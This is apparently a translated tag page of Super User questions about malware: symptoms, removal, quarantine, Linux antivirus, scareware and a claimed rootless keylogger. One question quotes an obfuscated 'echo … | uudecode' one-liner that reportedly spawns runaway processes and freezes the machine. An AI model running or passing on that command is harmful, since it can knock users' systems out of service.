标签: malware

如果我的 Windows 计算机似乎感染了病毒或恶意软件，我该怎么办？

• 感染的症状是什么？
• 发现感染后该怎么办？
• 我能做些什么来摆脱它？
• 如何防止被恶意软件感染？

这个问题经常出现，建议的解决方案通常是相同的。这个社区 wiki 试图作为最终的、最全面的答案。

随意通过编辑添加您的贡献。

在随机 chan 板上找到：

echo "I<RA('1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==" | uudecode

以某种方式运行这会导致无限生成过程，该过程猖獗并使机器停止。我看到一些关于“su”的东西试图被多次执行。

..这很奇怪，因为我只希望输出文本，而不是执行任何内容。

通过在线解码器运行此文本只会给我一批二进制输出：

这些乱七八糟的文字究竟在做什么，有没有办法“安全”地查看它？

为什么杀毒软件不彻底删除病毒、恶意软件等，而是将它们隔离？彻底摆脱它们不是更好吗？为什么？以及如何手动删除它们？

我意识到在 Windows PC 上防病毒是遥不可及的，但为了将作为“家庭技术支持”花费的时间保持在最低限度，我正在寻找将计算机锁定到它的点的想法很难收集广告软件/间谍软件、恶意软件或病毒。

假设用户是我的妈妈，她很少（如果有的话）需要管理员访问权限，并且主要使用计算机进行 MS Office 和 Web 浏览。

可能的重复：
如何从我的 PC 中清除恶意间谍软件、恶意软件、病毒或 rootkit？

我正在为朋友排除 Windows 7 PC 的故障。几天前，它开始运行“缓慢”。事实证明，“慢”是第一次看到桌面大约需要 15 分钟，另外 30 分钟才能显示图标。它是可以打开任务管理器，似乎没有任何出错，CPU占用率在1-5％，大量的内存免费的。

不过，这台机器显然感染了恶意软件，特别是一个名为“Optimizer Pro”的程序要钱来“删除降低我计算机速度的 5102 个文件”。这似乎非常可疑。

不过，我的问题是，我无法访问msconfig（我希望将它输入到“开始”菜单并按 Enter 键后，我将其放置了几个小时 - 似乎没有加载任何内容），或者根本无法访问任何内容。我可以从 Linux Live CD 启动，但我真的可以从那里做任何有用的事情吗？

系统还原也没有修复它，安全模式表现出相同的行为。

我正在通过 torrent下载AVI文件，但我的防病毒软件检测到了一些东西。AVI 文件是否可能包含病毒？

这很奇怪，因为 torrent 有很多正面评价。

Linux 如何防御病毒？

这个问题是本周的超级用户问题。
阅读博客条目以了解更多详细信息或自己为博客做出贡献

我最近开始使用 Ubuntu。我想知道在 Ubuntu 上安装防病毒程序的意义。在 SuperUser 上，我发现它只检测“windows 病毒”并将其删除。如果我没有任何其他操作系统，安装防病毒软件是否有意义？

据我所知，Linux 没有病毒。恶意软件和任何其他有害程序呢？不安装任何保护软件是否安全？

最近每次启动windows vista，都会看到一个随机的浮动窗口。这是一个没有标题的小窗口，只有调整大小、最大化和恢复按钮。我会发布一张图片，但我在这里还没有声誉。

我可以关闭它，它确实消失了，但我很想弄清楚它是什么并完全阻止它弹出。我在它上面使用了 Autohotkey 的窗口间谍，我学到的只是它是一个摆动窗口，这对我没有多大帮助。

有没有好的方法来识别它属于哪个进程并弄清楚如何杀死它？

Youtube 上有人声称在 Ubuntu 上有一个键盘记录器，既没有以 root 身份执行也没有安装。下面的链接显示了它的工作演示。

http://www.youtube.com/watch?v=Y1fZAZTwyPQ

尽管他们声称相反，但此人本可以在演示视频之前以 root 用户身份安装它。是否有任何其他半可信的证据表明这在没有 root 安装或执行的情况下真的是可能的？

更新：如果没有 sudo/root，6 月 24 日的答案中引用的软件将无法安装。我已经向任何提供链接到可以使用常规用户权限安装和运行的工作 Linux 键盘记录软件的人悬赏。